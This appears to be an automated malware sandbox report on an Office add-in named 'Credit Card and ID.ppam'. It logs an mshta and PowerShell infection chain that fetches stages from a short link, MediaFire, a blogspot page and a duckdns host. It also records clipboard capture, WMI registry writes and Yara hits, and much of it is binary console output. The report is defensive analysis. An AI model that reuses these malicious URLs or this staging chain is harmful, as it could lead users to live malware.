Source: mshta.exe, 00000010.00000002.498179973.000000000331E000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501276074.00000000056CF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ODOASODOccomplermxjdajse[1].htm Jump to behavior
Source: unknown DNS traffic detected: queries for: j.mp
Source: global traffic HTTP traffic detected: GET /ODOASODOccomplermxjdajse HTTP/1.1 Accept: */* Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: j.mp Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /file/o7mbmqzedgahqhw/30.doc/file HTTP/1.1 Accept: */* Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: www.mediafire.com
Source: global traffic HTTP traffic detected: GET /k67dpqw5qwtg/o7mbmqzedgahqhw/30.doc HTTP/1.1 Accept: */* Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Cookie: ukey=6xpb2tazciakllrv4ebq5j0751h13hdf Connection: Keep-Alive Host: download1370.mediafire.com
Source: global traffic HTTP traffic detected: GET /p/30.html HTTP/1.1 Accept: */* Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: kdaoskdokaodkwldld.blogspot.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/1529571102-css_bundle_v2.css HTTP/1.1 Accept: */* Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.blogger.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/403901366-ieretrofit.js HTTP/1.1 Accept: */* Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.blogger.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=3903609419317699398&zx=5f07c876-ed15-412f-a301-ebcedf46395e HTTP/1.1 Accept: */* Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.blogger.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/1397508952-widgets.js HTTP/1.1 Accept: */* Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.blogger.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://kdaoskdokaodkwldld.blogspot.com/p/30.html&type=blog HTTP/1.1 Accept: */* Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.blogger.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ServiceLogin?passive=true&continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26type%3Dblog%26bpli%3D1&go=true HTTP/1.1 Accept: */* Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: accounts.google.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fkdaoskdokaodkwldld.blogspot.com%2Fp%2F30.html&type=blog&bpli=1 HTTP/1.1 Accept: */* Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.blogger.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/body_gradient_tile_light.png HTTP/1.1 Accept: */* Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: resources.blogblog.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/gradients_light.png HTTP/1.1 Accept: */* Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: resources.blogblog.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s1/30.txt HTTP/1.1 Accept: */* Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.starinxxxgkular.duckdns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1 Accept: */* Referer: http://www.starinxxxgkular.duckdns.org/s1/30.txt Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.google.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/errors/robot.png HTTP/1.1 Accept: */* Referer: http://www.starinxxxgkular.duckdns.org/s1/30.txt Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.google.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s1/30.txt HTTP/1.1 Accept: */* Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.starinxxxgkular.duckdns.org Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 67.199.248.16:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 205.196.123.58:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.45:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49179 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\mshta.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\mshta.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Yara signature match
Source: 00000005.00000003.440508255.00000000002D7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.439129933.0000000003A3E000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.439823527.0000000003A41000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000002.441615888.0000000003A42000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.430608858.00000000002D2000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.440010639.00000000002D7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.439977474.00000000002D7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.438513361.0000000002EAC000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.440413446.0000000003A42000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.436677431.0000000002EA4000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.439894402.00000000002D7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.439936041.00000000002D7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000002.441611782.0000000003A3E000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.436681950.0000000002EAC000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.438685953.0000000002EA6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.440409722.0000000003A3F000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000002.440932261.00000000002D7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.430614086.00000000002D7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.430602975.00000000002DD000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Abnormal high CPU Usage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 98%
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: Credit Card and ID.ppam Virustotal: Detection: 23%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..................... .k......................_.............}..v...../......0.......................z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................'.k...../................_.............}..v....H0......0...............8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ ........ .k......................_.............}..v.....3......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................'.k.....4................_.............}..v.....5......0...............8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................0.......#.......................0.......................`I.........v.....................K...................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k.... )z..............._.............}..v.....)z.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k....p_S..............._.............}..v....h0z.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k.... 1z..............._.............}..v.....1z.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k....p_S..............._.............}..v.....6z.....0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.M.....;.................*k.....7z..............._.............}..v....08z.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....H<z.....0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k.....=z..............._.............}..v.....=z.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k....p_S..............._.............}..v.....Bz.....0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k....XCz..............._.............}..v.....Cz.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k....p_S..............._.............}..v.....Jz.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k....XKz..............._.............}..v.....Kz.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k....... . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v.....Oz.....0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k.................*k.....Pz..............._.............}..v....0Qz.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w.................*k....p_S..............._.............}..v....pVz.....0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w.................*k....(Wz..............._.............}..v.....Wz.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v....8[z.....0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....[z..............._.............}..v....p\z.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....`#......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....$................_.............}..v.....$......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....`+......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....,................_.............}..v.....,......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....1......0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....2................_.............}..v....(3......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....@7......0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....7................_.............}..v....x8......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....=......0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....P>................_.............}..v.....>......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....E......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....PF................_.............}..v.....F......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v.....J......0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....K................_.............}..v....(L......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....hQ......0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.... R................_.............}..v.....R......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k......................_.............}..v....0V......0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....V................_.............}..v....hW......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....z......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....{................_.............}..v....(|......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....(.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....p_S..............._.............}..v............0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....8................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.......A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v............0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k....p_S..............._.............}..v....(.......0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k......................_.............}..v....`.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k....p_S..............._.............}..v....(.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k......................_.............}..v....`.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S....... . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v............0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k....8................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k....p_S..............._.............}..v............0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k......................_.............}..v....0.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k....... .........*k....p_S..............._.............}..v............0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k.................*k....x................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
